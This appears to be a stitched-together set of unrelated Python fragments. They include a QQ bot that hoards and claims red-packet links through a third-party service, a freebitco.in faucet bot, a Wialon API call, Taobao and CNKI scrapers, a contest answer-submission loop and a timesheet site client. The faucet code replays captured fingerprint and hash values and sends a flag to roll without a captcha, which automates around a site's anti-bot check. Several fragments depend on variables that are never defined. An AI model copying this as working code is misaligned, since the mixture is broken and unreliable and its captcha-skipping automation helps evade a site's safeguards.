            # Instead, Boolean values are stored as integers 0 (false) and 1 (true).
            cur.execute(
                'CREATE TABLE IF NOT EXISTS %s (url TEXT PRIMARY KEY, used INTEGER DEFAULT 0)' % table)
            # if content == '.clrdb':
            #     try:
            #         cur.execute('DELETE FROM %s' % table)
            #         bot.SendTo(contact, 'Database cleared!')
            #     except Exception as e:
            #         bot.SendTo(contact, 'Clearing failed! Exception: ' + str(e))
            if content.startswith('https://url.cn/') and len(content) == 22:
                bot.SendTo(contact, content)
                bot.SendTo(contact, 'Red packet link received, processing...')
                try:
                    # Parameterized query; the original interpolated the URL
                    # directly into the SQL string.
                    cur.execute('INSERT INTO %s VALUES(?, 0)' % table, (content,))
                    bot.SendTo(contact, 'Added!')
                    con.commit()
                except Exception as e:
                    # The original tested `'Duplicate' or 'UNIQUE' in str(e)`,
                    # which is always true; each substring must be checked.
                    if 'Duplicate' in str(e) or 'UNIQUE' in str(e):
                        bot.SendTo(contact, 'Add failed! This red packet already exists!')
                    else:
                        bot.SendTo(contact, 'Add failed! Exception: ' + str(e))
                    con.rollback()
            elif content == '.1':
                bot.SendTo(contact, 'Searching...')
                cur.execute('SELECT url FROM %s WHERE used=0' % table)
                data = cur.fetchone()
                if data is None:
                    bot.SendTo(contact, 'No red packets left!')
                else:
                    url = data[0]
                    url_login = '******'
                    headers = {
                        'Host': 'api.mtdhb.org',
                        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
                        'Accept': 'application/json, text/plain, */*',
                        'Accept-Language': 'en-US,en-US;q=0.7,en;q=0.3',
                        'Accept-Encoding': 'gzip, deflate, br',
                        'Content-Type': 'application/x-www-form-urlencoded',
                        'DNT': '1',
                        'Connection': 'keep-alive'}
                    browser = HTMLSession()
                    browser.get(url_login, headers=headers)
                    data_login = {'account': ACCOUNT, 'password': PASSWORD}
                    url_login_api = 'https://api.mtdhb.org/user/login'
                    r = browser.post(url_login_api, data=data_login)
                    if r.json()['code'] == 0:
                        bot.SendTo(contact, 'Logged in...')
                        url_receive_api = 'https://api.mtdhb.org/user/receiving'
                        data_receive = {'phone': '', 'url': url, 'force': 0}
                        headers['X-User-Token'] = r.json()['data']['token']
                        r = browser.post(url_receive_api, data=data_receive, headers=headers)
                        if r.json()['code'] == 0:
                            sec = 3
                            bot.SendTo(contact, 'Making the warm-up claim... waiting %d seconds' % sec)
                            url_number_api = 'https://api.mtdhb.org/user/number'
                            time.sleep(sec)
                            r = browser.get(url_number_api, headers=headers)
                            if r.json()['code'] == 0:
                                bot.SendTo(contact, 'Remaining uses: %d' % r.json()['data']['ele']['available'])
                                bot.SendTo(contact, 'Total uses: %d' % r.json()['data']['ele']['total'])
                            else:
                                bot.SendTo(contact, 'Failed to fetch usage counts! JSON = %s' % r.json())
                            bot.SendTo(contact, 'Best-luck red packet link below, ready to claim:')
                            bot.SendTo(contact, url)
                            try:
                                cur.execute('UPDATE %s SET used=1 WHERE url = ?' % table, (url,))
                                con.commit()
                                cur.execute('SELECT count(*) FROM %s WHERE used=0' % table)
                                bot.SendTo(contact, 'Unused red packets: %d' % cur.fetchone()[0])
                            except Exception as e:
                                bot.SendTo(contact, 'Failed to update the flag!\n' + str(e))
                                con.rollback()
                        else:
                            bot.SendTo(contact, 'Warm-up claim failed! JSON = %s' % r.json())
                    else:
                        bot.SendTo(contact, 'Login failed! JSON = %s' % r.json())
            elif content == '.11':
                bot.SendTo(contact, 'Searching...')
                cur.execute('SELECT url FROM %s WHERE used=0' % table)
                data = cur.fetchone()
                if data is None:
                    bot.SendTo(contact, 'No red packets left!')
                else:
                    url = data[0]
                    bot.SendTo(contact, 'Red packet link below:')
                    bot.SendTo(contact, url)
                    try:
                        cur.execute('UPDATE %s SET used=1 WHERE url = ?' % table, (url,))
                        con.commit()
                        cur.execute('SELECT count(*) FROM %s WHERE used=0' % table)
                        bot.SendTo(contact, 'Unused red packets: %d' % cur.fetchone()[0])
                    except Exception as e:
                        bot.SendTo(contact, 'Failed to update the flag!\n' + str(e))
                        con.rollback()
            elif content == '.2':
                try:
                    cur.execute('SELECT count(*) FROM %s WHERE used=0' % table)
                    bot.SendTo(contact, 'Unused red packets: %d' % cur.fetchone()[0])
                    # cur.fetchone() => Row
                    # cur.fetchone()[0] => Row[Col=0]
                    cur.execute('SELECT count(*) FROM %s' % table)
                    bot.SendTo(contact, 'Total red packets: %d' % cur.fetchone()[0])
                except Exception as e:
                    bot.SendTo(contact, 'Query failed! Exception: ' + str(e))
            elif content.startswith('.u1 '):
                url = content.split(' ')[1]
                if url.startswith('https://url.cn/') and len(url) == 22:
                    try:
                        cur.execute('UPDATE %s SET used=1 WHERE url=?' % table, (url,))
                        con.commit()
                        bot.SendTo(contact, 'Marked')
                    except Exception as e:
                        con.rollback()
                        bot.SendTo(contact, 'Marking error: ' + str(e))
                else:
                    bot.SendTo(contact, 'Invalid link!')
            elif content.startswith('.u0 '):
                url = content.split(' ')[1]
                if url.startswith('https://url.cn/') and len(url) == 22:
                    try:
                        cur.execute('UPDATE %s SET used=0 WHERE url=?' % table, (url,))
                        con.commit()
                        bot.SendTo(contact, 'Marked')
                    except Exception as e:
                        con.rollback()
                        bot.SendTo(contact, 'Marking error: ' + str(e))
                else:
                    bot.SendTo(contact, 'Invalid link!')
            elif content.startswith('.'):
                bot.SendTo(contact, 'Unknown command, send [.help] for help')
            cur.close()
            con.close()
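# A minimal sketch of wiring the handler above into qqbot. Assuming the
# pandolia/qqbot package, message slots are registered with the QQBotSlot
# decorator and the bot is started with RunBot(); this is an illustration,
# not the original project's entry point.
from qqbot import QQBotSlot as qqbotslot, RunBot

@qqbotslot
def onQQMessage(bot, contact, member, content):
    ...  # body as defined above

if __name__ == '__main__':
    RunBot()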
import logging
import random
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import quote
from requests_html import HTMLSession
# LoginError and _RewardType are defined elsewhere in this module.


class Client:
    _URL = 'https://freebitco.in'

    def __init__(self, verify_ssl=True):
        self._logger = logging.getLogger('root.fbclient_direct')
        self._session = HTMLSession()
        self._session.verify = verify_ssl
        # Cache entries are (html, expiry, cache_time_seconds).
        self._cache = defaultdict(lambda: (None, datetime.now(), 5))

    def _check_login(func):
        def wrapper(*args, **kwargs):
            self = args[0]
            self._logger.debug('Verifying login')
            html = self._get_main_page()
            if html.find('#balance', first=True):
                return func(*args, **kwargs)
            self._logger.error('You are not logged in')
            raise LoginError('Not logged in')
        return wrapper

    def login(self, username, password, otc=None):
        self._logger.info(f'Logging in, user: {username}')
        if not username:
            self._logger.error('Username required')
            raise ValueError('Username required')
        elif not password:
            self._logger.error('Password required')
            raise ValueError('Password required')
        login_page = self._session.get(f'{self._URL}/?op=signup_page')
        csrf = login_page.cookies['csrf_token']
        self._session.headers['x-csrf-token'] = csrf
        data = (f'csrf_token={quote(csrf)}'
                f'&op=login_new'
                f'&btc_address={quote(username)}'
                f'&password={quote(password)}')
        if otc:
            data += f'&tfa_code={otc}'
        response = self._session.post(self._URL, data)
        result = response.text.split(':')
        if result[0] == 's':
            self._logger.info('Login success')
            self._session.cookies['btc_address'] = result[1]
            self._session.cookies['password'] = result[2]
            self._session.cookies['have_account'] = '1'
        elif result[0] == 'e':
            raise LoginError(f'Login failed: {result[1]}')
        else:
            raise LoginError(f'Login failed: {response}')

    @_check_login
    def activate_rp_bonus(self, amount=100):
        return self._activate_bonus(_RewardType.Points, amount)

    @_check_login
    def activate_lottery_bonus(self, amount=100):
        return self._activate_bonus(_RewardType.Lottery, amount)

    @_check_login
    def activate_btc_bonus(self, amount=1000):
        return self._activate_bonus(_RewardType.FreeBTC, amount)

    @_check_login
    def roll(self, play_without_captcha=False):
        self._logger.info('Rolling')
        self._session.get(f'{self._URL}')  # refresh session state before rolling
        # The fingerprint and hash-named parameters below are site-specific
        # values captured from the page and are left as-is.
        data = (f'csrf_token={self._session.headers["x-csrf-token"]}'
                f"&op=free_play"
                f"&fingerprint=43b0ec50d04dfcf473f26b8fa7c8f72f"
                f"&client_seed={self._get_roll_seed()}"
                f"&fingerprint2=2592886125"
                f"&pwc={int(play_without_captcha)}"
                f"&89591411d5cf=1567309413%3A26e9b826a33e321aa27c09d235c158ff18de7f48ce850838ffe7f669cc30b436"
                f"&d4202f82cc23=1b208b3be22da3a07e58deb40fbecc0ef43b43b3216b8c2cc9ba7bc28646c21e")
        response = self._session.post(self._URL, data)
        result = response.text.split(':')
        if result[0] == 's':
            self._logger.info(f'Roll success, number: {result[1]}, win: {result[3]} BTC, balance: {result[2]} BTC')
            return True
        elif result[0] == 'e':
            self._logger.error(f'Roll failed: {result[1]}')
        else:
            self._logger.error(f'Roll failed: {response.text}')
        return False

    @_check_login
    def get_roll_timer(self):
        self._logger.info('Retrieving roll timer')
        html = self._get_main_page()
        # Raw string avoids invalid-escape warnings in the regex.
        time_remaining_pattern = re.compile(r"\$\('#time_remaining'\).countdown\({until: \+(\d+)")
        match = time_remaining_pattern.search(html.html)
        if not match:
            self._logger.info('Timer not running')
            return 0
        countdown = match.group(1)
        self._logger.info(f'Timer value: {countdown}')
        return int(countdown)

    @_check_login
    def get_balance(self):
        self._logger.info('Retrieving points balance')
        html = self._get_main_page()
        balance = html.find('#balance', first=True).text
        self._logger.info(f'Balance: {balance}')
        return float(balance.replace(',', ''))

    @_check_login
    def get_rp_bonus_timer(self):
        return self._get_rewards_timer(_RewardType.Points)

    @_check_login
    def get_lottery_bonus_timer(self):
        return self._get_rewards_timer(_RewardType.Lottery)

    @_check_login
    def get_btc_bonus_timer(self):
        return self._get_rewards_timer(_RewardType.FreeBTC)

    @_check_login
    def get_rewards_balance(self):
        self._logger.info('Retrieving rewards balance')
        html = self._get_main_page()
        points = html.find('div.user_reward_points', first=True).text
        self._logger.info(f'Rewards points: {points}')
        return int(points.replace(',', ''))

    def _get_rewards_timer(self, reward_type):
        self._logger.info(f'Retrieving rewards timer: {reward_type.bonus_id}')
        html = self._get_main_page()
        bonus_pattern = re.compile(rf'BonusEndCountdown\("{reward_type.bonus_id}",(\d+)\)')
        match = bonus_pattern.search(html.html)
        if not match:
            self._logger.info(f'Bonus timer: {reward_type.bonus_id} not running')
            return 0
        countdown = match.group(1)
        self._logger.info(f'Timer value: {countdown}')
        return int(countdown)

    def _get_main_page(self):
        # Serve the main page from a short-lived cache to avoid hammering the site.
        html, expiry, cache_time = self._cache['html']
        if datetime.now() >= expiry:
            self._logger.debug('Downloading main page')
            html = self._session.get(f'{self._URL}/?op=home').html
            expiry = datetime.now() + timedelta(seconds=cache_time)
            self._cache['html'] = (html, expiry, cache_time)
        return html

    def _activate_bonus(self, reward_type, amount):
        self._logger.info('Activating: %s %d bonus' % (reward_type.name, amount))
        response = self._session.get(f'{self._URL}/'
                                     f'?op=redeem_rewards'
                                     f'&id={reward_type.bonus_id}_{amount}'
                                     f'&points='
                                     f'&csrf_token={self._session.headers["x-csrf-token"]}')
        result = response.text.split(':')
        if result[0] == 's':
            self._logger.info('Bonus activation successful')
            return True
        elif result[0] == 'e':
            # The original logged "Roll failed" here; this method activates a
            # bonus, so the message is corrected.
            self._logger.error(f'Bonus activation failed: {result[1]}')
        else:
            self._logger.error(f'Bonus activation failed: {response.text}')
        return False

    def _get_roll_seed(self, length=16):
        self._logger.info('Generating roll seed')
        chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
        seed = str.join('', (random.choice(chars) for i in range(length)))
        self._logger.debug('Seed: %s' % seed)
        return seed
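# A minimal usage sketch for the client above. The credentials are
# placeholders; roll() only succeeds once the site's roll timer has expired.
client = Client()
client.login('username_or_btc_address', 'password')
if client.get_roll_timer() == 0:  # 0 means the timer is not running
    client.roll()
print(client.get_balance())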
import sys

# data, sid, session, url_host and url_resurs come from the earlier login and
# request steps of this script.
data_list = data["items"]
data_list_items = data_list[0]
data_nm = data_list_items["nm"]
if data_nm == 'profpererobka':
    reportResourceId = data_list_items["id"]
    print(f'reportResourceId: {reportResourceId}')

# Note: the original read "¶ms=" here, a mojibake of "&params=" (the
# "&para" prefix was decoded as the ¶ HTML entity).
params = 'core/search_items&sid=' + sid + '&params='
cur_object = 'AA9186XE'
body = '{"spec":{"itemsType":"avl_unit","propName":"sys_name","propValueMask":"' + cur_object + \
       '","sortType":"sys_name"},"force":1,"flags":1,"from":0,"to":0}'
url_params = url_resurs + params + body  # used only by the commented-out GET below
print(f'{url_host}{url_resurs}{params}')
# res = session.get(url_host + url_params)
res = session.post(url_host + url_resurs + params, body)  # Content-Type: application/json
if res.status_code != 200:
    sys.exit(res.status_code)
data = res.json()
print(data)
# reportObjectId = data['items'][0]['id']
# print(f'reportObjectId: {reportObjectId}')
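# A hedged sketch of how the sid used above is typically obtained from the
# Wialon remote API: a token/login call returns a session whose "eid" serves
# as the sid for later svc calls. The token value, the token/login service
# name, and the "eid" response field follow the public Wialon API docs and
# are assumptions, not part of this script.
import json

login_res = session.post(
    url_host + url_resurs + 'token/login&params=' +
    json.dumps({"token": "YOUR_API_TOKEN"}))
sid = login_res.json()["eid"]  # session id for subsequent requests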
import json
from time import sleep
from requests_html import HTMLSession
# dataprocess is a project-local helper module.


class Engine:
    def __init__(self, **kwargs):
        self.q = None
        self.s = None
        self.cps = None
        self.cat = None
        self.ppath = None
        self.loc = None
        self.mode = None
        self.kwargs = None
        self.json = None
        self.url = None     # site URL (required)
        self.cookie = None  # login verification (required)
        self.filter = None
        self.session = HTMLSession()
        self.article = "https://s.taobao.com/search?"         # item-search URL
        self.store = "https://shopsearch.taobao.com/search?"  # shop-search URL
        self.header = {
            "cookie": None,
        }

    def get_cookie(self, user, password):
        """Fetch the login cookie."""
        url = 'https://login.taobao.com/newlogin/login.do?appName=taobao&fromSite=0'
        parameter = {
            'loginId': user,
            'password2': password,
        }
        html = self.session.post(url, data=parameter)
        print(html.cookies)
        # Note: html.cookies is a CookieJar, while a header value is normally
        # a string; this mirrors the original behavior.
        self.header['cookie'] = html.cookies

    def __get_parameter(self, s):
        """Build the query parameters."""
        self.kwargs = {
            'q': self.q,
        }
        if self.mode == '宝贝':  # "items" mode; any other value searches shops
            self.url = self.article
        else:
            self.url = self.store
        if self.cps == 'yes':
            self.kwargs['cps'] = 'yes'
        if self.cat:
            self.kwargs['cat'] = self.cat
        else:
            self.kwargs['ppath'] = self.ppath
        if self.loc:
            self.kwargs['loc'] = self.loc
        if s != 0:
            self.kwargs['s'] = s * 44  # 44 results per page
        return self.kwargs

    def __get_html(self, s):
        """Fetch a result page and decode the embedded g_page_config JSON."""
        self.__get_parameter(s)
        html = self.session.get(self.url, headers=self.header, params=self.kwargs)
        print(html.url)
        html = html.text
        start = html.find('g_page_config = ') + len('g_page_config = ')
        end = html.find('"shopcardOff":true}') + len('"shopcardOff":true}')
        # with open('index.html', 'w', encoding='utf-8') as f:
        #     f.write(html)
        js = json.loads(html[start:end + 1])
        self.json.append(js)
        sleep(1)

    def load_data(self):
        """Run the search; results are collected into self.json."""
        self.json = []
        for s in range(int(self.s)):
            self.__get_html(s)
        self.set_auctions()
        # self.set_filter()

    def set_ppath(self, ppath):
        """Set the ppath value (':' and ';' are percent-encoded)."""
        self.cps = 'yes'
        self.ppath = ppath.replace(":", "%3A").replace(";", "%3B")

    def set_loc(self, loc):
        """Set the loc value (',' is percent-encoded)."""
        self.cps = 'yes'
        self.ppath = self.ppath if self.ppath else ''
        self.loc = loc.replace(",", "%2C")

    def set_auctions(self):
        """Collect every item listing on the page (list)."""
        return dataprocess.set_auctions(
            [d['mods']["itemlist"]["data"]["auctions"] for d in self.json])

    def set_filter(self):
        """Collect the item categories (dict: common = all categories, adv = filter criteria)."""
        return dataprocess.set_filter(
            [self.json[0]['mods']["nav"]['data']['common']])

    @staticmethod
    def get_filter():
        """get filter"""
        # return dataprocess.getFilter()
        ...

    def get_pager(self):
        """Get the s page numbers."""
        return [d['mods']['pager']['data'] for d in self.json]

    def get_price(self):
        """Get the popularity and price-range data (list)."""
        return self.json[0]['mods']['sortbar']['data']['price']['rank']

    def get_related(self):
        """Get related searches (list)."""
        return self.json[0]["related"]["data"]["words"]

    def get_tab(self):
        """Get the tab parameters (list)."""
        return self.json[0]["tab"]["data"]["tabs"]

    def get_header(self):
        """Get the URL parameters (dict):
        q           keyword
        tabParams   suffix: js, stats_click, initiative_id, ie
        dropdown    prefix-switch list: url, text
        """
        return self.json[0]["header"]["data"]

    def detection(self):
        ...
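# A minimal usage sketch for the Engine above: fetch one page of item results
# for a keyword. The keyword and page count are placeholders, and a valid
# logged-in cookie is normally required for taobao search results.
engine = Engine()
engine.q = '手机壳'   # search keyword (placeholder)
engine.s = 1          # number of result pages to fetch
engine.mode = '宝贝'  # item search; any other value searches shops
engine.load_data()
print(engine.get_pager())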
from scipy import integrate  # needed for integrate.quad below

# Leftover (commented-out) manual parser for splitting "frac" terms; the
# scipy-based evaluation below superseded it.
# i = 0
# while i < len(txt2):
#     if txt2[i: i + 4] == "frac":
#         in_frac = True
#     if txt2[i] == "(":
#         cnt += 1
#     if txt2[i] == ")":
#         cnt -= 1
#         if cnt == 0:
#             seg += 1
#             if seg == 2:
#                 txt1 = txt2[:i + 1]
#                 txt2 = txt2[i + 1:]
#                 break
print(txt2)
try:
    # f_ builds a callable from the parsed expression; mn and mx are the
    # integration bounds extracted earlier in the script.
    res, err = integrate.quad(f_(txt2), mn, mx)
    print(mn, mx, res)
    # Use a separate name for the HTTP response so it does not shadow the
    # integral value.
    resp = session.post("http://202.38.93.111:10190/submit", data={"ans": "%f" % res})
    print("success!!", total)  # total is the running count kept by the outer loop
    print(resp.content)
except Exception:
    # Fall back to a fixed guess when evaluation fails.
    resp = session.post("http://202.38.93.111:10190/submit", data={"ans": "2.33333333"})
import re
from dateutil.relativedelta import relativedelta, MO, FR
from requests_html import HTMLSession
# TODAY, LoginError, WebsiteError and Timesheet are defined elsewhere in this
# module.


class TimesheetAPI:
    LOGIN_URL = "https://www.timesheets.com.au/tplogin/default.asp"
    VIEW_TIMESHEET_URL = "https://www.timesheets.com.au/tp60/ViewTimeSheet.asp"
    INPUT_TIME_URL = "https://www.timesheets.com.au/tp60/InputTime.asp"
    ERROR_TABLE_XPATH = '//a[@name="ErrorTable"]/following-sibling::table'

    LoginError = LoginError
    WebsiteError = WebsiteError

    def __init__(self):
        self.session = HTMLSession()
        self.user_context_id = None
        self.staff_id = None
        self.logged_in = False

    def _parse_html_login_errors(self, error_table):
        error_tds = error_table.xpath(
            '//img[@src="images/invalid.png"]/ancestor::tr[1]/td[2]'
        )
        return [e.text for e in error_tds]

    def _parse_html_options(self, html, option_name, selected=False):
        if selected:
            options = html.xpath(
                f'//select[@name="{option_name}"]//option[@selected]'
            ) or html.xpath(f'//input[@name="{option_name}"]')
        else:
            options = html.xpath(
                f'//select[@name="{option_name}"]//option[not(@value="")]'
            )
        options = [(o.attrs.get("value"), o.text) for o in options]
        if selected:
            return options[0] if options else None
        return options

    def _parse_html_customer_options(self, html):
        options = self._parse_html_options(html, option_name="CustomerCode_0_0")
        customers = []
        for code, description in options:
            customers.append(
                {"customer_code": code, "customer_description": description}
            )
        return customers

    def _parse_html_project_options(self, html):
        # Raw strings throughout: the pattern contains regex escapes such as
        # \( and \s, which trigger invalid-escape warnings otherwise.
        pattern = (
            r"AddProjectEntry\("
            r"'(?P<customer_code>[^']*?)',"
            r"'(?P<project_code>[^']*?)',"
            r"'(?P<project_psid>[^']*?)',"
            r"'(?P<project_description>[^']*?)',"
            r"(?P<task_count>[^']*?)"
            r"\)\s"
        )
        projects = re.finditer(pattern, html.html)
        return [p.groupdict() for p in projects]

    def _parse_html_task_options(self, html):
        pattern = (
            r"AddTaskEntry\("
            r"'(?P<project_code>[^']*?)',"
            r"'(?P<task_id>[^']*?)',"
            r"'(?P<task_description>[^']*?)'"
            r"\)"
        )
        tasks = re.finditer(pattern, html.html)
        return [t.groupdict() for t in tasks]

    def login(self, username, password, customer_id):
        data = {
            "CurrentClientTime": "",
            "compact": "off",
            "ForceInterface": "S",
            "systemid": customer_id,
            "username": username,
            "password": password,
        }
        r = self.session.post(self.LOGIN_URL, data=data)
        # Detect errors
        error_table = r.html.xpath(self.ERROR_TABLE_XPATH, first=True)
        if error_table:
            errors = self._parse_html_login_errors(error_table)
            raise LoginError(" ".join(errors))
        # Detect a rejected logon
        rejected_login_input = r.html.find('input[name="RejectedLogon"]')
        if rejected_login_input:
            raise LoginError("Invalid login credentials.")
        # Find UserContextID (required for future session requests)
        user_context_input = r.html.find('input[name="UserContextID"]', first=True)
        if user_context_input:
            self.user_context_id = user_context_input.attrs.get("value")
        else:
            raise LoginError("UserContextID not found in login response.")
        # Load the ViewTimesheet page to get the StaffID
        r = self.session.post(
            self.VIEW_TIMESHEET_URL, data={"UserContextID": self.user_context_id}
        )
        staff_id_input = r.html.find('input[name="StaffID"]', first=True)
        if staff_id_input:
            self.staff_id = staff_id_input.attrs.get("value")
        else:
            raise LoginError("StaffID not found in login response.")
        self.logged_in = True

    def get_timecodes(self):
        if not self.logged_in:
            raise LoginError("Not logged in.")
        next_month_end = TODAY + relativedelta(months=+1, day=31)
        filter_day = next_month_end.strftime("%d-%b-%Y")
        data = {
            "UserContextID": self.user_context_id,
            "StaffID": self.staff_id,
            "Mode": "Day",
            "StartDate": filter_day,
            "EndDate": filter_day,
        }
        r = self.session.post(self.INPUT_TIME_URL, data=data)
        customers = self._parse_html_customer_options(r.html)
        projects = self._parse_html_project_options(r.html)
        tasks = self._parse_html_task_options(r.html)
        return customers, projects, tasks

    def get_timesheet(self, start_date=None, end_date=None):
        if start_date is None and end_date is None:
            # Default to this week's timesheet (excluding the previous month)
            start_date = max(
                [TODAY + relativedelta(day=1), TODAY + relativedelta(weekday=MO(-1))]
            )
            end_date = TODAY + relativedelta(weekday=FR)
        r = self.session.post(
            self.INPUT_TIME_URL,
            data={
                "UserContextID": self.user_context_id,
                "StaffID": self.staff_id,
                "Mode": "Week",
                "StartDate": start_date.strftime("%d-%b-%Y"),
                "EndDate": end_date.strftime("%d-%b-%Y"),
            },
        )
        customer_options, project_options, task_options = self.get_timecodes()
        return Timesheet(
            html=r.html,
            customer_options=customer_options,
            project_options=project_options,
            task_options=task_options,
        )

    def post_timesheet(self, timesheet):
        form_data = timesheet.form_data()
        row_count = timesheet.count_entries()
        form_data.update(
            {
                "UserContextID": self.user_context_id,
                "StaffID": self.staff_id,
                "InputRows": row_count,
                "Save": "%A0%A0Save%A0%A0",
                "DataForm": "TimeEntry {}".format(self.staff_id),  # Important!
                # 'OptionsDisplayed': 'N',
                # 'OverrideAction': '',
                # 'DeletesPending': ''
            }
        )
        r = self.session.post(
            self.INPUT_TIME_URL,
            data=form_data,
            headers={"Referer": self.INPUT_TIME_URL},
        )
        # Detect errors
        error_table = r.html.xpath(self.ERROR_TABLE_XPATH, first=True)
        if error_table:
            errors = self._parse_html_login_errors(error_table)
            raise WebsiteError(" ".join(errors))
        return r
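# A minimal usage sketch for TimesheetAPI. The credentials and customer id
# are placeholders; Timesheet's own interface is defined elsewhere in the
# module and is touched only through form_data()/count_entries() here.
api = TimesheetAPI()
api.login("jane.doe", "secret", customer_id="12345")
customers, projects, tasks = api.get_timecodes()
timesheet = api.get_timesheet()  # defaults to the current week
api.post_timesheet(timesheet)    # submits the entries back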
import re
import time
from urllib.parse import quote
from requests_html import HTMLSession
# BASIC_URL, POST_URL, GET_PAGE_URL, HEADER and GetDetail are defined
# elsewhere in this script.


class GetPage():
    def __init__(self):
        self.session = HTMLSession()
        self.cur_page_num = 1  # current page number
        # Fetch a cookie to keep the session alive
        self.session.get(BASIC_URL, headers=HEADER)

    # Takes the search keyword and the search field; both must be str
    def getSearchResult(self, kword, condition):
        # The searched databases can be restricted here; no restriction is applied.
        static_post_data = {
            'action': '',
            'NaviCode': '*',
            'ua': '1.21',
            'isinEn': '1',
            'PageName': 'ASP.brief_default_result_aspx',
            'DbPrefix': 'SCDB',
            'DbCatalog': '中国学术期刊网络出版总库',
            'ConfigFile': 'SCDB.xml',
            'db_opt': 'CJFQ,CDFD,CMFD,CPFD,IPFD,CCND,CCJD',  # search categories (right-hand panel on CNKI)
            'his': '0',
            '__': time.asctime(time.localtime()) + ' GMT+0800 (中国标准时间)'
        }
        # The search field can be changed here; the keys mean:
        # 主题 = subject, 关键词 = keyword, 篇名 = title, 摘要 = abstract, 全文 = full text
        search_condition = {
            '主题': 'SU$%=|',
            '关键词': 'KY$=|',
            '篇名': 'TI$%=|',
            '摘要': 'AB$%=|',
            '全文': 'FT$%=|'
        }
        u_input = {
            'txt_1_sel': '',
            'txt_1_value1': '',
            'txt_1_relation': '#CNKI_AND',
            'txt_1_special1': '='
        }
        u_input['txt_1_sel'] = search_condition.get(condition)
        u_input['txt_1_value1'] = kword
        post_data = dict(static_post_data, **u_input)
        # Send the POST request
        req_first = self.session.post(POST_URL, data=post_data, headers=HEADER)
        # URL-encode the search keyword
        k_v = quote(u_input.get('txt_1_value1'))
        # Build the URL and send a GET request for the result-list page;
        # t is a hardcoded millisecond timestamp captured from the site.
        result_url = GET_PAGE_URL + req_first.text + '&t=1544249384932&keyValue=' + k_v + '&S=1&sorttype='
        req_sec = self.session.get(result_url, headers=HEADER)
        # Parse the result-list page: title, detail-page URL, author, source,
        # publication date, database, citation count, download count
        rows = req_sec.html.xpath('//tr[@bgcolor]')
        for row in rows:
            td = row.find('td')
            title = td[1].find('a', first=True).text
            detail_url = re.sub('/kns', 'http://kns.cnki.net/KCMS',
                                td[1].find('a', first=True).attrs['href'])
            author = td[2].text
            journal = td[3].text
            publish_date = td[4].text
            database = td[5].text
            cite_count = row.find('span[class="KnowledgeNetcont"]', first=True)
            if cite_count:
                cite_count = cite_count.text
            else:
                cite_count = 0
            print(title)
            print(detail_url)
            print(author)
            print(journal)
            print(publish_date)
            print(database)
            print(cite_count)
            i = GetDetail().parsePage(detail_url)
            if i:
                for a in i:
                    print(a)
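# A minimal usage sketch: search CNKI by subject ('主题') for a keyword and
# print the parsed result rows. The keyword is a placeholder; BASIC_URL,
# POST_URL, GET_PAGE_URL and HEADER must already be defined as in the script.
if __name__ == '__main__':
    page = GetPage()
    page.getSearchResult('深度学习', '主题')  # keyword, search field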